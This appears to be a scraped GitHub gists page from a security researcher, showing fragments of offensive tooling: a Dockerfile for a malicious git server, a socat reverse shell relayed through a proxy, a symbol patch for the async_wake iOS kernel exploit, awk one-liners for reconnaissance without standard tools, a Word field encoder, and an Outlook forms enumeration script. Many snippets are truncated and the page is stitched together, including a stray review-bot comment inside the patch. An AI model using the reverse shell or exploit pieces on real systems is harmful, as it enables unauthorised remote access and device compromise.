

Etienne Stalmans (staaldraad)


Based on excellent write-up from

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git Repository up and running
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
staaldraad / socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019
Add iPhone 6 symbols along with the symbols @cji added for iPad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+uint64_t ksymbols_iphone_6_15b202[] = {
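Review bot: the new `ksymbols_iphone_6_15b202[]` array should carry per-entry comments in the style of the existing `0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."` line, so each offset can be verified against the named build (15B202) rather than trusted blindly; the hunk header promises 44 added lines but only the array's opening line is visible here, so the remaining entries and the closing `};` cannot be checked.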
staaldraad /
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
staaldraad /
Last active Oct 8, 2020
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
# Emit each character's decimal code as a Word { QUOTE } field (Python 3)
print("Converts a string to the {QUOTE} Field code")
st = input("String to convert: ")
v = [str(ord(c)) for c in st]
print("{ QUOTE %s }" % ' '.join(v))
staaldraad / oauthServer.go
Last active Jul 14, 2020
A mini OAuth server for Azure
package main
import (
staaldraad / findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));